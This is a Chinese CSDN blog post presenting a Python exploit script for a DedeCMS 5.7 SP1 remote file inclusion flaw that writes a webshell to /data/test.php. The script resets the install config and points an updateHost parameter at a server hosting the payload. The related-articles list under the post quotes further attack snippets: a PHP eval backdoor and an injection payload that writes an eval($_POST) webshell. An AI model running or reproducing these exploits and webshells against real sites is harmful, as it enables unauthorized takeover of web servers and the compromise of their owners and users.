python学习之dedecms exp编写

最新推荐文章于 2021-02-11 00:36:26 发布
最新推荐文章于 2021-02-11 00:36:26 发布
阅读量715 收藏 2
点赞数 1
分类专栏: python学习 文章标签: python exp编写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/90511221
版权

python学习之dedecms exp编写

针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。
exp
# -*- coding:utf-8 -*-

import requests
import time

def dada(url):
    url_index=url+"/install/index.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
                            (KHTML, like Gecko) Chrome/51.0.    2704.103 Safari/537.36"}
    try:
        url_request=requests.get(url_index,headers)
        time.sleep(3)
        if(url_request.status_code==200):
            print("漏洞文件存在,开始测试")
            time.sleep(5)
            url_url = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php"  # 重置其参数
            print(url_url)
            requests.get(url=url_url, headers=headers)  # 发送重置请求
            # time.sleep(2)
            url_url2 = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/test.php&updateHost=http://127.0.0.1/"  # 换成存在demodata.x.txt地址
            print(url_url2)
            requests.get(url=url_url2, headers=headers)  # 发送exp
            url_exp = url + "/data/test.php"
            url_final = requests.get(url=url_exp, headers=headers)

            if url_final.status_code == 200:
                print("攻击成功,请访问 \n "+url_exp)
            else:
                print("测试失败,请人工测试")
        else:
            print("检测完成,该漏洞不存在")

    except:
        print("error:请检测网络或者url地址")

    #print(url)

if __name__ == '__main__':
    dada("http://127.0.0.1/dede/dedecms")

不要问我为什么加延迟,因为逼格高

cxk331
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python实现定制EXP
weixin_51693574的博客
01-31 919
python实现定制EXP 一、POC和EXP 四个常见概念: POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的) EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的) Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:Payload的一种,由于其建立正向/反向shell而得名。 一个形象的比喻: 想象自己是特工,你目标是监控一个重要的
dedecms 5.7 一句话后门利用 exp
fengling132的专栏
04-22 1593
http://www.wooyun.org/bug.php?action=view&id=5416 shopcar.class.php 被植入一句话 @eval(file_get_contents('php://input')); 去官网下了一套回来,看了下代码, class MemberShops { var $OrdersId; var $productsId;
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 2342
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
Python exp() 函数
MTbaby的博客
11-29 1万+
Python exp() 函数描述exp() 函数返回 x 的指数,exe^x语法import math math.exp(x)注意:exp() 是不能直接访问的,需导入 math 模块,通过静态对象调用该方法。参数 x 数值表达式 返回值返回 x 的指数 exe^x实例# -*- coding: UTF-8 -*- import math # 导入 math 模块print "math.exp
DEDECMS拿SHELL EXP
收集盒 Book box
09-05 945
此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell 因此大家一定要养成使用DEDECM建站时改后台名字的习惯。 MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTI
73.Python学习编写函数共2页.pdf.zip
10-29
73.Python学习编写函数共2页.pdf.zip
学习python编写简单乘法运算题
01-20
/usr/bin/python //处理程序 #filename jiafa.py //文件名 import sys import random running = True //定义running while running: a=random.randint(0,15) //定义a的值为0-15的随机数 b=random.randint(0,10...
python学习编写查询ip程序
12-24
公司服务器上的ip最少的也有100多个,有时候查到一个站的Ip, 不想通过OA去查,自己就用自己最近学的python知识,结合数据库,编写了一python小程序。实现只要输入主ip就能查到这台服务器的子ip,输入子ip能查到此ip...
python之——使用python编写爆破脚本
12-21
此处以dvwa网站的密码爆破为例... #coding:utf-8 """ dvwa高级爆破 ...""" import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" ... req=urllib2.Request(url,headers={"Cookie":"security=high;...
根据python书籍学习脚本编写
03-08
根据python书籍学习脚本编写
dedecms漏洞getshell EXP最新可用
weixin_33674976的博客
06-18 544
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download...
Dedecms V5.7 SP2版本漏洞利用
dahege666的博客
03-07 9285
一、环境搭建 系统:Win10(64位) 工具:Phpstudy 源码:DedeCMS-V5.7-GBK-SP2-Full 二、安装phpstudy https://www.xp.cn/download.html 安装完成后.... 三、下载dedecms源码 http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5....
Python编写EXP
weixin_41489908的博客
08-10 2317
高考过后,你不用告诉我你考多少分,悲喜之后也不要告诉我你志愿填了哪里,只要告诉我最后去了哪?我坐火车或飞机要多久,在此停留能否蹭口饭吃,一本二本我真的分不清楚,我只知道你是我朋友。。。 ---- 网易云热评 一、环境 1、python3 2、用到的模块requests 二、requests模块应用 1、获取网页的内容 # coding=utf-8 import requests res=requests.get("http://192.168.1.129/html/1.html")..
python学习之ecshop exp编写
cxk
06-04 492
python学习之ecshop exp编写 针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import requests import time def ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...
python学习exp整合
cxk
06-10 960
python学习exp整合 将上述的三个exp利用脚本整合为一个,简单的cms漏洞识别利用功能 使用方法 python demo.py "url" # -*- coding:utf-8 -*- import urllib import urllib.request import requests import os import hashlib #import test.py import ...
python自动生成采集规则_Python爬虫结合dedecms自动采集发布
weixin_28877505的博客
02-11 816
之前想实现一个爬虫,实时采集别人的文章,根据自己的规则去修改采集到的文章,然后自动发布。决定用dedecms做新闻发布,还可以自动生成html,自动把远程图片本地化等一些优点,为了安全,完全可以把前后台分离。起初想用scrapy爬虫框架去实现,觉得定制开发的话用scrapy只能用到里面的一些基础的功能,有一些情况要跟着框架的规则走,如果自己写的话可以自己写规则去处理,也有优点爬虫、处理器等,最后还...
编写poc和exploit的几款常用工具介绍
热门推荐
koozxcv的博客
06-12 1万+
1.pwntools pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 sudo pip install pwntools即可安装
PYTHON编写智能学习程序
最新发布
04-14
编写智能学习程序, 首先需要选择合适的机器学习算法和数据集。然后, 可以使用 Python 中的机器学习库, 如 scikit-learn, TensorFlow 或 PyTorch, 来训练模型并进行预测。最后, 可以使用 Python 的可视化工具, 如 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值